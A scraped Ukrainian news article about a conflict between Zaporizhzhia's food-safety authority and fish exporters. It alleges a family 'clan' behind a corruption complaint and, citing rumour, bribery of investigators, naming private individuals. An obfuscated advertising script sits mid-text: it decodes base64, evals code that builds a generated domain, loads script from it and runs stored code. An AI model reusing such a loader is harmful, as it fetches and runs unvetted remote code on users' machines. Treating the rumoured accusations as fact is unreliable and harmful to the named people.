На підприємців, які приховали долю 11 тон бракованої риби, чекає велика та ретельна щорічна перевірка

У конфлікті між Держпродспоживслужбою Запорізької області та компаніями ТОВ «Альбакор» і ТОВ «Компанія Стінгрей» (торгова марка Veladis) з’явилися нові деталі та фігуранти. І це суттєво змінює погляд на ситуацію.

Нагадаємо, запорізькі риботоргівці звинувачують керівництво Держспоживслужби у вимаганні неправомірної вигоди під час оформлення дозвільних документів на експорт своєї продукції. Своєю чергою, керівництво Держспоживслужби наполягає на неухильному дотриманні обумовлених законом процедур для отримання зазначених дозволів, що і може бути справжньою причиною «звинувачень» у корупції.

Щоб простежити причинно-наслідковий зв’язок, пригадаємо, з чого все почалося.

До приходу в Запорізьке управління Держпродспоживслужби нового керівництва в жовтні 2022 року підприємства «Альбакор» та «Компанія Стінгрей» привозили прямо до управління зразки риби для отримання дозволів на експорт — що було грубим порушенням приписаної законом процедури. Тому коли нові очільники Держпродспоживслужби стали вимагати дотримання закону, виник конфлікт. Далі, в грудні того ж року, чотири лабораторних аналізи поспіль виявили в великій партії судака, 11,4 тон, перевищення допустимих показників одного з мікробіологічних випробувань. Як результат, експортна операція була зірвана, а партія риби, ринкова вартість якої перевищує 2,5 млн грн, зникла у невідомому напрямку.

На першому етапі конфлікту соратниками запорізьких риботоргівців виступили бізнес-союз «Порада» і Асоціація українських імпортерів риби та морепродуктів. Разом з «Альбакором» та «Компанієй Стінгрей» підписували відкриті листи, копії яких надсилали в Офіс президента України, Кабмін, НАБУ, Запорізьку обласну військову адміністрацію і навіть бізнес-омбудсмену України. Але відсутність реакції з боку цих інстанцій – можливо, через безпідставність звинувачень — а також стрімкий перебіг часу спонукали підприємців піти іншим шляхом. Так з’явилось звернення до Генпрокуратури, за змістом якого було відкрите кримінальне впровадження, внесене в ЄРДР за № 42023080000000038. З цього місця стежити за розвитком конфлікту стає цікавіше, оскільки у справі з’являються нові досить несподівані деталі й фігуранти.

По перше, заявником, який звинувачує керівництво Держпродспоживслужби у кримінальному правопорушенні за ч. 3 ст. 368 КК України, виступають не ТОВ «Альбакор» і ТОВ «Компанія Стінгрей», а громадянка В.В. Якубовська, яка, як з’ясовується, не є співробітником цих компаній.

По друге, про начебто тиск на схиляння до участі в корупційній схемі заявляють вже не тільки запорізькі риботорговці, а ще й працівники Запорізької регіональної державної лабораторії Державної служби України з питань безпечності харчових продуктів і захисту споживачів та адміністрація Критого ринку Запоріжжя.

Щоб зрозуміти, що відбувається, зануримось у подробиці.

Заявитель Вікторія Вікторівна Якубовська працює завідувачем державної лабораторії ветеринарно-санітарної експертизи №2 Запорізької районної державної лікарні ветеринарної медицини на агропродовольчому ринку Критий КП «Запоріжринок». Виникає запитання: про який корупційний тиск на неї йдеться, якщо вона, хоча й підпорядковується Держпродспоживслужбі, по суті є незалежною від неї у своїй діяльності? І такою ж незалежною, до речі, є Запорізька регіональна державна лабораторія. І чому, запитуємо далі, до правоохоронних органів не звертаються ТОВ «Альбакор» і ТОВ «Компанія Стінгрей»? Адже їх образа та матеріальні витрати через оформлення дозволів на експорт в інших областях нікуди не зникли.

Відповідь на ці досить риторичні запитання криється в родинних та професійних зв’язках громадянки Якубовської. Отже, її рідний брат Ігор Занімонцев працює лікарем ветеринарної медицини державної лабораторії ветеринарно-санітарної експертизи №15 Запорізької районної державної лікарні ветеринарної медицини на агропродовольчому ринку Великий базар ТОВ «Югтранссервіс».
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Їх батько, Віктор Занімонцев, здійснює поставку м`ясної продукції (домашня птиця) до ринків: «Критий ринок», «Великий базар», «Сокіл» КП «Запоріжринок».

А їх мати, Марія Миколаївна Занімонцева, є заступником директора Запорізької регіональної державної лабораторії Держпродспоживслужби — тїєї самої, що тричі забракувала велику партію судака в грудні минулого року (ще один, контрольний аналіз робили в Дніпрі) і яка взагалі-то робить аналізи для оформлення дозволів на експорт.

Таким чином, маємо згуртоване сімейне угрупування, яке має безпосереднє відношення до лабораторного аналізу великих обсягів різних продуктів, включаючи рибу, і, відповідно, до великих грошових потоків. Тому зовсім не дивно, що сім’я мала щільні контакти зі службою УБОЗ, за якою, якщо вірити публікаціям у ЗМІ, тягнувся довгий шлейф корупційних діянь.

До приходу нового керівництва у Запорізьку Держпродспоживслужбу і окремі співробітники цієї служби, і регіональна державна лабораторія працювали з ТОВ «Альбакор» і ТОВ «Компанія Стінгрей» без зайвих суперечок. Коли ж комфортні схеми було паламано, прийшлось пристосовуватись до обставин. Саме тому, вказана лабораторія тричі виявила перевищення допустимих показників одного з мікробіологічних випробувань в великій партії риби. Виявила, бо зразки після проведеного аналізу ще деякий час зберігаються в холодильнику і, якщо неочікувана їх перевірка виявить підробку в уже виданих висновках, можна позбутися посади, в сенсі добре насидженого теплого містечка. Але довго терпіти такий стан справ теж неможливо. Тому цілком можливо припустити, що як голова сімейного клану мати, Марія Занімонцева, вирішила використати в якості торпеди правосуддя свою доньку, Вікторію Якубовську. Тим більше, що прізвище тієї не асоціюється з прізвищем матері.

Як випливає з листа в.о. начальника першого відділу управління обласної прокуратури Євгена Макаренка, адресованого В.В. Якубовській, проведення досудового розслідування доручено слідчим Другого слідчого відділу (з дислокацією у м. Запоріжжі) Територіального управління ДБР, розташованого у м. Мелітополі. Що ж, дочекаємось результатів роботи цієї структури.

Паралельно з цим, за чутками, стало відомо, що анонімні ділки нещодавно здійснили турне столичними офісами правоохоронних відомств, пропонуючи чималі гроші за «результативне» розслідування кримінального провадження, відносно незговірливих очільників Держпродспоживслужби в Запорізькій області. Але, отримавши відмову в столичних кабінетах, повернулись на свій регіональний рівень і, поговорюють в Запоріжжі, все ж таки знайшлись нечисті на руку співробітники, які спокусились чималою сумою від 50 до 100 тис. доларів і тепер старанно відпрацьовують замовлення, шукаючи неіснуючу чорну кішку в темній кімнаті.

Так це чи ні насправді, з’ясувати поки що неможливо, але відкидати зацікавленість певних осіб у такому розвитку ситуації явно зарано.

По перше, незговірливе керівництво Держпродспоживслужби одним своїм існуванням вже гальмує реалізацію нових не зовсім законних схем у сфері експорту рибної продукції. По друге, в серпні має відбутись велика щорічна перевірка службою ТОВ «Альбакор» і ТОВ «Компанія Стінгрей», під час якої стане нарешті зрозуміла доля 11,4 тонн забракованого судака. І якщо риба не була пущена на переробку, а реалізована у своєму первісному вигляді, то компаніям загрожує колосальний штраф – близько 600 тис. грн. Погодьтеся, заради цього варто проявити трохи розторопності. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/na-pidpriyemtsiv-yaki-prihovali-dolyu-11-ton-brakovanoyi-ribi-chekaye-velika-ta-retelna-shhorichna-perevirka/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top